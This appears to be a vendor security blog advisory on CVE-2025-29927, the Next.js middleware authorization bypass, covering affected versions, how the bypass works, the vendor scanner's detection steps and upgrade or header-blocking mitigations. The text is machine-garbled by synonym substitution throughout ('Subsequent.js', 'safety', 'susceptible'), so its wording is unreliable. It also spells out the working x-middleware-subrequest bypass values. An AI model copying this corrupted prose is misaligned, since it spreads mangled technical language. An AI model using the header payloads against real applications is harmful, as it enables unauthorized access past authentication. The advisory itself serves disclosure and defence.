Next.js Authorization Bypass Vulnerability (CVE-2025-29927)

A essential vulnerability within the Subsequent.js framework, formally disclosed on March 21, 2025, permits attackers to bypass middleware safety controls by a easy header manipulation. This submit summarizes what we learn about CVE-2025-29927, how one can mitigate the vulnerability, and the way Acunetix can assist you detect and ensure your group’s threat.

What it’s essential learn about CVE-2025-29927

• A distant authorization bypass vulnerability recognized as CVE-2025-29927 was confirmed in Subsequent.js, one of the standard React frameworks used to construct net functions.
• The vulnerability permits attackers to fully bypass Subsequent.js performance in an utility, together with generally used essential safety features resembling authentication and authorization.
• As of March 24, 2025, Acunetix has an energetic safety verify to detect and report exploitable Subsequent.js variations.
• The vulnerability impacts the next Subsequent.js variations:
  • Subsequent.js 11.1.4 by 13.5.6 (unpatched)
  • Subsequent.js 14.x earlier than 14.2.25
  • Subsequent.js 15.x earlier than 15.2.3
• Upgrading to a non-vulnerable model is the one assured repair. Proxy-level WAF blocking may match briefly however is just not beneficial in the long term.

Perceive your Subsequent.js middleware bypass threat

The vulnerability permits attackers to fully bypass the middleware performance by together with a specifically crafted x-middleware-subrequest header of their requests. You’ll be able to consider middleware as a processing chain that lets software program modules examine, modify, or reroute an HTTP request earlier than it reaches its remaining code handler. It’s a pure place to implement issues like authentication, and one quite common sample is to have middleware redirect to a login web page if no legitimate authentication cookie is discovered.

This vulnerability is especially regarding as a result of Subsequent.js middleware is usually used for essential safety features resembling authentication, authorization, path rewriting, and implementing safety headers. All of those may be trivially bypassed by an attacker just by utilizing a particular HTTP header.

Are you susceptible to the Subsequent.js middleware bypass?

In case your reply to BOTH of the next questions is “sure”, your utility is susceptible until patched:

• Do you depend on Subsequent.js middleware for safety controls?
• Are you working a self-hosted Subsequent.js utility utilizing subsequent begin with output: "standalone'?

Functions are significantly in danger if:

• You utilize middleware for authentication or authorization checks
• You depend on middleware for implementing safety headers like Content material Safety Coverage (CSP), used to outline limitations on the place sources are permitted to be loaded
• You utilize middleware for path rewriting to limit entry to sure routes

Functions hosted on Vercel or Netlify are not affected, as these platforms have carried out mitigations at their edge layers. Functions deployed as static exports (the place middleware is just not executed) are additionally not affected.

When you don’t know the small print of your Subsequent.js utilization or need the power to evaluate it independently, working an automatic DAST software to substantiate your vulnerability is a superb place to begin.

How the Subsequent.js middleware vulnerability works

Subsequent.js middleware makes use of an inside header referred to as x-middleware-subrequest to forestall recursive requests from triggering infinite loops. The safety vulnerability permits an attacker to govern this header to trick the Subsequent.js utility into skipping middleware execution totally.

For various variations of Subsequent.js, the exploit works barely in another way:

• For older variations (pre-12.2):
  x-middleware-subrequest: pages/_middleware
• For contemporary variations:
  x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
  (or src/middleware:src/middleware:src/middleware:src/middleware:src/middleware if utilizing the src listing)

When this header is current with the suitable worth, the middleware is totally bypassed, permitting the request to succeed in its authentic vacation spot with none safety checks or modifications that may have been utilized by the middleware.

How Invicti DAST merchandise detect CVE-2025-29927

Energetic detection logic (Acunetix)

Invicti’s safety analysis crew has developed a verify for the Acunetix engine to detect in case your functions are susceptible to CVE-2025-29927. As of Monday, March 24, 2025, this verify is reside for all Acunetix Premium prospects.

Right here’s how the energetic verify works step-by-step:

1. Establish Subsequent.js middleware utilization: The verify first seems to be for the telltale indicators of Subsequent.js middleware, particularly a 307 redirect the place the response physique equals the situation header worth. This sample is exclusive to Subsequent.js middleware redirects.
2. Confirm Subsequent.js framework presence: Affirm the applying is utilizing Subsequent.js by checking for the x-powered-by: Subsequent.js header in responses.
3. Check with bypass payloads: The detection mechanism tries completely different bypass payloads based mostly on the potential Subsequent.js model:
   • For newer variations (13.2.0+): middleware:middleware:middleware:middleware:middleware (and the src variant)
   • For older variations (pre-12.2): pages/_middleware
   • For intermediate variations (12.2 to 13.2.0): middleware
4. Validation by distinction: To keep away from false positives, the check performs a number of validation checks:
   • Ship a request with the potential bypass header and verify if it returns a 200 OK.
   • Ship a management request with a barely modified header, resembling Y-Middleware-Subrequest, to substantiate it nonetheless redirects (307).
   • Ship one other request with an invalid worth to substantiate correct conduct.
   • Repeat the profitable bypass to make sure consistency.
5. Affirm vulnerability: Solely in spite of everything validation steps go is the vulnerability confirmed, lowering the danger of false positives.

Passive detection by visitors evaluation with dynamic SCA (Invicti)

The vulnerability is detected by passive monitoring of net visitors throughout a safety scan with out making energetic requests. Invicti Enterprise makes use of this method with its vulnerability database to detect the flaw. This method seems to be for the x-powered-by: Subsequent.js header in responses, which confirms the applying is utilizing Subsequent.js. The presence of the susceptible model is additional confirmed by evaluating the subsequent.model perform within the browser’s JavaScript context to extract the exact model

We then evaluate this worth to our constantly up to date database of identified CVEs and community detection signatures to find out if an insecure model of Subsequent.js has been encountered.

As of Tuesday, March 25, 2025, this verify is reside for all Invicti Enterprise, Invicti Commonplace, and Acunetix 360 prospects. 

Mitigation steps for CVE-2025-29927

1. Replace instantly:
   • For Subsequent.js 15.x: Replace to ≥ 15.2.3
   • For Subsequent.js 14.x: Replace to ≥ 14.2.25
   • For Subsequent.js 13.x: Replace to ≥ 13.5.9
   • For Subsequent.js 12.x: Replace to ≥ 12.3.5
2. If updating isn’t attainable instantly:
   • Block the x-middleware-subrequest header at your edge/proxy stage (not in middleware itself).
   • Cloudflare customers can allow a Managed WAF rule that blocks this assault. Bear in mind that Cloudflare has modified this WAF rule to be opt-in after studies of third celebration authentication frameworks being impacted. We recommend you give attention to upgrading Subsequent.js.

Invicti Safety wish to acknowledge Rachid Allam and Yasser Allam for his or her authentic analysis and writeup of their findings, in addition to our inside groups that labored to end up a verify to prospects inside a single enterprise day.

Our safety crew is constantly monitoring this example and can replace as extra data turns into obtainable.

THE AUTHOR

Bogdan Calin

Acunetix builders and tech brokers frequently contribute to the weblog. All of the Acunetix builders include years of expertise within the net safety sphere.